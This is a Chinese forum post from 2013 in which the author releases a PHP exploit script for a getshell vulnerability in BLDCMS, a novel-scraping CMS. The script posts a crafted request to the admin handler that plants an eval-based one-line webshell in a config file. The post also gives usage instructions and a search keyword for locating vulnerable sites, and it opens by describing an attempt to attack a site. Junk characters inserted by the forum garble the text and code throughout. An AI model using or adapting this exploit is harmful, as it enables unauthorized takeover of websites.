之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞3 L+ Q/ G7 |% c q
9 E3 x' d4 ~9 J4 ]% J% S' f
, s/ d$ \5 c1 d/ k2 G: ~话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
' ~; k% ?$ H& b$ m; k- n0 h
/ m& P% A, x. z! l3 v9 h- A既然都有人发了 我就把我之前写好的EXP放出来吧5 u* h9 u7 @# G* m- W4 A
# k& p2 l5 W: l2 Y
view source print?01.php;">: h |7 o. H6 F b7 W( t
02.<!--?php
# g8 T: t# s* f9 `03.echo "-------------------------------------------------------------------
- t( d2 |2 a: a, j9 j04. ) d& p" T& v0 E b
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP5 T- J! v: b5 p) Y7 Z
06. ' M+ i/ s; e: a! d+ E
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun0 U( r: U! ?, f
08. : I: ]/ ~6 t( h0 X- A( C- v
09.QQ:981009941\r\n 2013.3.21\r\n
( T6 ^% u4 {9 ]# B( L1 w& F$ S0 U+ B10. 1 T4 e1 T; i2 f# O) d
11.
9 E5 L9 v$ P+ p8 L: W' Q+ L8 p12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
7 {# l3 c9 B2 w6 Q1 P, U13. 1 k! j, o/ L* D. {1 F; R) \+ J
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
1 @( m# w" b& ]! s8 H( r9 i15.
2 N- }, P' ^. Y+ b; G c$ r( Z2 E16.--------------------------------------------------------------------\r\n";
6 p: v G; T. M, a/ c+ w17.$url=$argv[1];1 ^, R! b' n0 u& N% I7 v- q5 V
18.$dir=$argv[2];
0 ^' H# g+ S7 T# v# h19.$pass=$argv[3];
* e. C( q& j U7 w20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';9 q0 p/ }- s3 |4 w7 t% H8 q
21.if (emptyempty($pass)||emptyempty($url))
/ t" n; i4 I, i$ i6 e0 r22.{exit("请输入参数");}
6 y y: P* c+ m23.else
% g i" W' N( }24.{; B) P {7 r+ Z8 V7 I: w
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
2 U' R' e) a' c( I) P' u6 l26.
6 i/ K9 k1 d% }3 e% ]. a27.al; Z# T- f: N6 i) a) _+ L
28.$length = strlen($fuckdata);- B- s. d' O2 ]+ T& U) J% y! T
29.function getshell($url,$pass)3 F3 k+ M4 ~% m5 ^% k( C; h
30.{1 }2 z% |6 U' v+ G
31.global $url,$dir,$pass,$eval,$length,$fuckdata;! V" p3 |# b1 G, y
32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";) Z8 D3 R' q* i8 r0 J
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
+ @ z/ q+ y. v6 S6 t, L7 I34.$header .= "User-Agent: MSIE\r\n";
/ o5 d, y4 K0 q' M35.$header .= "Host:".$url."\r\n";
- @+ k3 X2 V8 x3 p! K" N36.$header .= "Content-Length: ".$length."\r\n";
6 l# t' I# ` g- S: X! m37.$header .= "Connection: Close\r\n";' P% [0 R4 s5 J/ m
38.$header .="\r\n";2 }" Y, m A4 X. @
39.$header .= $fuckdata."\r\n\r\n";" k) G; w; p' N2 L7 T
40.$fp = fsockopen($url, 80,$errno,$errstr,15);
, B4 U) D. z& j- U1 v& A, a41.if (!$fp)
2 X+ l! c! B2 P42.{
9 p- v4 o8 s. z2 q) n43.exit ("利用失败:请检查指定目标是否能正常打开");
# B9 G: e& F. \, v* E# I44.}9 ]( U4 M/ t* x) b; {( q
45.else{ if (!fputs($fp,$header))
" N, g5 D8 J4 @( X46.{exit ("利用失败");}1 ~- Y2 [+ X; V. L
47.else r! L6 S- i5 P$ S) f! R
48.{
( W; b$ j( x8 `, X8 L; D49.$receive = '';* Y3 B1 j9 F, r, H1 k
50.while (!feof($fp)) {. M+ B/ ^" t; j' q7 R$ S
51.$receive .= @fgets($fp, 1000);
! ?6 o. F O4 l* o8 T4 @. T2 ^" M7 v# ]52.}2 I [# k7 n6 |8 z8 _: f; q
53.@fclose($fp);
# L5 V- a: C) _5 m54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标
' o4 D" n% z; [% e55. 0 i0 O" b/ w6 S& z" A1 c0 c! \- D9 W
56.GPC是否=off)";! U6 u& f: k# F* @
57.}}
/ a; S- B4 \% C" T) H& O! T9 h58.}% g! u( I- T% x6 K+ T' p! b
59.}2 c; [' J5 j6 `) G. z4 N6 D
60.getshell($url,$pass);
) }0 v# P# |! V r$ N7 D6 z61.?-->
% N7 ~& b+ r2 ]3 I9 F : n+ U: l2 ^( d" `3 ]& ~6 g
6 B: Z# I; A, T- k$ S
& S) f8 U: o9 v) x+ kby 数据流
) r+ z4 r7 f# S7 V |
发表于 2013-3-26 20:49:10
收藏
支持
反对